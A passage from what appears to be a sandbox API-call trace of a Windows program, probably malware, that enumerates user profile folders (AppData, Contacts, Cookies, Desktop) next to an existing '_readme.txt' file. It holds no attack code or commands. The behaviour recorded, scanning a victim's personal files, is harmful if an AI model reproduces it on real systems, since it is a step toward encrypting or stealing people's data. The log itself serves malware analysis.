nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7b830 [0228.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7baa0 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3959ed0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3959ed0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf553c810, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0xf553c810, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf553c810, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0228.768] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf553c810, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0xf553c810, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf553c810, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0228.768] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1958 | out: hHeap=0x620000) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7b90 | out: hHeap=0x620000) returned 1 [0228.769] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.769] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.769] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.769] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.769] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0228.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.769] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.769] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.769] PathFindFileNameW (pszPath="") returned="" [0228.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9a8663c0, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x9a8663c0, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0228.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0228.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3c53a50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3c53a50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0228.769] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3c53a50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3c53a50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0228.769] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.770] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0228.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.770] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.770] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.770] PathFindFileNameW (pszPath="") returned="" [0228.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa3c53a50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa3c53a50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.770] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0228.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.771] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.771] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.771] PathFindFileNameW (pszPath="") returned="" [0228.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0228.771] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0228.771] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.771] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0228.771] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.771] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.772] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.772] PathFindFileNameW (pszPath="") returned="" [0228.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e30 | out: hHeap=0x620000) returned 1 [0228.772] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0228.772] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.772] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.772] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.772] PathFindFileNameW (pszPath="") returned="" [0228.772] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x828f3260, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x828f3260, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4e88 | out: hHeap=0x620000) returned 1 [0228.772] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x828f3260, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x828f3260, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.772] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f00670, ftCreationTime.dwHighDateTime=0x1d5c237, ftLastAccessTime.dwLowDateTime=0x221e1f80, ftLastAccessTime.dwHighDateTime=0x1d5c06f, ftLastWriteTime.dwLowDateTime=0x221e1f80, ftLastWriteTime.dwHighDateTime=0x1d5c06f, nFileSizeHigh=0x0, nFileSizeLow=0x554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-G-HIJj-GN6to.avi", cAlternateFileName="-G-HIJ~1.AVI")) returned 1 [0228.772] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9e35790, ftCreationTime.dwHighDateTime=0x1d5b831, ftLastAccessTime.dwLowDateTime=0xa06d4650, ftLastAccessTime.dwHighDateTime=0x1d5b853, ftLastWriteTime.dwLowDateTime=0xa06d4650, ftLastWriteTime.dwHighDateTime=0x1d5b853, nFileSizeHigh=0x0, nFileSizeLow=0xb62b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2 L11W.gif", cAlternateFileName="2L11W~1.GIF")) returned 1 [0228.772] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ea4b20, ftCreationTime.dwHighDateTime=0x1d5b75f, ftLastAccessTime.dwLowDateTime=0x8031db10, ftLastAccessTime.dwHighDateTime=0x1d5bf44, ftLastWriteTime.dwLowDateTime=0x8031db10, ftLastWriteTime.dwHighDateTime=0x1d5bf44, nFileSizeHigh=0x0, nFileSizeLow=0xac2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6M2GPMSiVGm.jpg", cAlternateFileName="6M2GPM~1.JPG")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821b1a20, ftCreationTime.dwHighDateTime=0x1d5c289, ftLastAccessTime.dwLowDateTime=0xdbbcb3e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e2, ftLastWriteTime.dwLowDateTime=0xdbbcb3e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e2, nFileSizeHigh=0x0, nFileSizeLow=0xdcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aBAkxckD12bhThY.wav", cAlternateFileName="ABAKXC~1.WAV")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47fd5890, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x57efe2c0, ftLastAccessTime.dwHighDateTime=0x1d5bf9c, ftLastWriteTime.dwLowDateTime=0x57efe2c0, ftLastWriteTime.dwHighDateTime=0x1d5bf9c, nFileSizeHigh=0x0, nFileSizeLow=0x4e81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="arGlISI8EjKQOcA.mp4", cAlternateFileName="ARGLIS~1.MP4")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f71d290, ftCreationTime.dwHighDateTime=0x1d5c094, ftLastAccessTime.dwLowDateTime=0xd652ed0, ftLastAccessTime.dwHighDateTime=0x1d5bee9, ftLastWriteTime.dwLowDateTime=0xd652ed0, ftLastWriteTime.dwHighDateTime=0x1d5bee9, nFileSizeHigh=0x0, nFileSizeLow=0x12dfb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BLK5--Ya.m4a", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b4bab40, ftCreationTime.dwHighDateTime=0x1d5bc30, ftLastAccessTime.dwLowDateTime=0x73297440, ftLastAccessTime.dwHighDateTime=0x1d5c580, ftLastWriteTime.dwLowDateTime=0x73297440, ftLastWriteTime.dwHighDateTime=0x1d5c580, nFileSizeHigh=0x0, nFileSizeLow=0x493f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cz0fxR.flv", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41aee250, ftCreationTime.dwHighDateTime=0x1d5c383, ftLastAccessTime.dwLowDateTime=0x3917a020, ftLastAccessTime.dwHighDateTime=0x1d5c34f, ftLastWriteTime.dwLowDateTime=0x3917a020, ftLastWriteTime.dwHighDateTime=0x1d5c34f, nFileSizeHigh=0x0, nFileSizeLow=0xf05a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EEIWxf1e4oDyL6.odt", cAlternateFileName="EEIWXF~1.ODT")) returned 1 [0228.773] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, 